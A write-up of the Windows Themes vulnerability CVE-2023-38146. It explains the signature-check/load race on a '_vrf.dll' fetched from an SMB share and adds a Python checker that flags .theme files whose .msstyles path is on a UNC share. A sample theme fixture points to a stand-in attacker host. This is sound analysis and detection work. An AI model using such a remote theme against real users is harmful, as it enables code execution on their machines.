CVE-2023-38146 is an arbitrary code execution vulnerability in Windows Themes, a file format responsible for customizing the appearance of the OS.
A .theme file is just a file containing configuration for that customization.
This vulnerability only exists starting with Windows 11, specifically in uxtheme.dll, so we can get a vulnerable version of the DLL from C:\Windows\WinSxS, where old versions of the DLL remain after the update.
The update was on 12-9-2023, so we need to grab one from before that date.
Placing it in the same directory as the component that needs it makes our vulnerable DLL come first in the DLL search order, so the vulnerable DLL is the one that gets used.
Double-clicking the .theme file results in the following command being executed:
"C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\themecpl.dll,OpenThemeAction <theme file path>
Firing up IDA on a vulnerable system and looking around the code, I found that there is another extension handled there besides .theme.
Looking inside the .theme file, there is a reference to a .msstyles file. Despite the extension, this file is actually a DLL: it gets loaded as data into the address space of the process, and then a resource inside it gets checked.
If the version in that resource is equal to "999", ReviseVersionIfNecessary, the vulnerable function, gets called.
Let us check what is happening inside. The function:
- appends _vrf.dll to the end of the msstyles file name
- opens the resulting file
- checks its signature
- closes the file
- loads the DLL
You may have noticed what could go wrong here: there is an obvious time-of-check/time-of-use race after the signature verification. If the location where the DLL resides is an attacker-controlled SMB server, the DLL can be replaced between the time of the signature check and the time of the load.
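As an added example (not code from the write-up), here is a small Python checker that parses the [VisualStyles] section of a .theme file and flags any .msstyles path that lives on a UNC share, also reporting the _vrf.dll path that the loader derives from it so defenders know what to look for in share or proxy logs. The sample theme contents and the share host name are constructed for the example.

```python
import configparser
import re
from typing import List, Tuple

# Constructed sample .theme files (INI format). The [VisualStyles] Path key
# names the .msstyles file, which Windows loads as a DLL; the write-up describes
# how "<that path>_vrf.dll" is then opened, signature-checked, closed and loaded.
SAMPLE_LOCAL_THEME = r"""[Theme]
DisplayName=Corporate
[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

SAMPLE_REMOTE_THEME = r"""[Theme]
DisplayName=Free Wallpaper
[VisualStyles]
Path=\\share.attacker.example\themes\pretty.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# UNC path: two leading backslashes, a host name, then a backslash (\\host\share\...).
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def verify_dll_path(msstyles_path: str) -> str:
    """Path the loader derives for the verification DLL: msstyles path + '_vrf.dll'."""
    return msstyles_path + "_vrf.dll"


def find_remote_msstyles(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (key, msstyles path, derived _vrf.dll path) for every [VisualStyles]
    entry whose .msstyles sits on a UNC share, i.e. a location a remote server
    controls between the signature check and the load."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key names exactly as written in the file
    cp.read_string(theme_text)
    findings: List[Tuple[str, str, str]] = []
    if not cp.has_section("VisualStyles"):
        return findings
    for key, value in cp.items("VisualStyles"):
        value = value.strip().strip('"')
        if value.lower().endswith(".msstyles") and UNC_RE.match(value):
            findings.append((key, value, verify_dll_path(value)))
    return findings
```

Paths that use an environment variable or a drive letter are treated as local; a relative path is only as trustworthy as the directory the .theme file itself was opened from.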